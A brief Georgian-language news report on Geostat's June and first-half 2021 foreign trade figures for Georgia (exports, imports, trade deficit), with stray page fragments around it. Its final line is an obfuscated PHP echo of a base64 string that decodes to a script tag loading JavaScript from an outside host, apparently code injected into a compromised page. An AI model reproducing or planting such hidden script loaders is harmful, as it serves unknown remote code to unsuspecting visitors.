celsiusi
ავერსი საქკაბელი
სტატისტიკის ეროვნული სამსახურის მიერ გამოქვეყნებული სტატისტიკური მონაცემების თანახმად,  გასული თვის განმავლობაში საქართველოდან უცხოეთში ექსპორტზე სულ $349 მილიონი დოლარის ღირებულების საქონელი გავიდა, რაც წინა წელთან შედარებით 30.4%-ით მეტია. 
 
საქსტატის თანახმად, მთლიანად იანვარ-ივნისის პერიოდში საქართველოს ექსპორტი $1.89 მილიადი დოლარი იყო, რაც 2020 წელთან შედარებით 25.5%-ით მეტია. 
 
ამავე ანგარიშის მიხედვით, წელს საქართველოს იმპორტი 19.5%-ით, $4.32 მილიარდ დოლარამდე გაიზარდა, უშუალოდ ივნისში კი იმპორტი $837 მილიონი დოლარი იყო, რაც 2020 წელთან შედარებით 37%-ით მეტია. შესაბამისად, გასულ თვეში იმპორტი უფრო მაღალი ტემპით გაიზარდა ვიდრე ექსპორტი. 
 
2021 წლის პირველ ნახევარში უარყოფითმა სავაჭრო ბალასნმა $2.43 მილიარდი დოლარი შეადგინა, რაც მთლიანად საგარეო სავაჭრო ბრუნვის 39%-ია.
 
საქსტატი საგარეო ვაჭრობის დეტალურ მონაცემებს 19 ივლისს გამოაქვეყნებს, რის შემდეგაც ცნობილი გახდება, შუალოდ რომელი საქონლის ექსპორტი და იმპორტი არის გაზრდილი.
1250
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");